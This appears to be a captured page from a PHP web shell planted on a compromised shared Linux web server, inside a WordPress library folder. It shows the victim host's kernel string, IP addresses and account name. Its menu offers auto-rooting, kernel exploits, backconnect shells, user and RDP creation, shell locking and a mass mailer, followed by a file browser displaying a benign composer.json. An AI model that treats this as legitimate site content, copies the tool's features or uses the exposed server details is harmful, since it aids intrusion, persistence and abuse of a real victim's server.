Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
gettext /
languages /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
LICENSE
1.06
KB
-rw-r--r--
UNICODE-LICENSE.txt
2.22
KB
-rw-r--r--
composer.json
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "gettext/languages", "description": "gettext languages with plural rules", "keywords": [ "localization", "l10n", "internationalization", "i18n", "translations", "translate", "php", "unicode", "cldr", "language", "languages", "plural", "plurals", "plural rules" ], "homepage": "https://github.com/php-gettext/Languages", "license": "MIT", "authors": [ { "name": "Michele Locati", "email": "mlocati@gmail.com", "role": "Developer" } ], "autoload": { "psr-4": { "Gettext\\Languages\\": "src/" } }, "autoload-dev": { "psr-4": { "Gettext\\Languages\\Test\\": "tests/test/" } }, "require": { "php": ">=5.3" }, "require-dev": { "phpunit/phpunit": "^4.8 || ^5.7 || ^6.5 || ^7.5 || ^8.4" }, "scripts": { "test": "phpunit" }, "bin": [ "bin/export-plural-rules", "bin/import-cldr-data" ] }
Close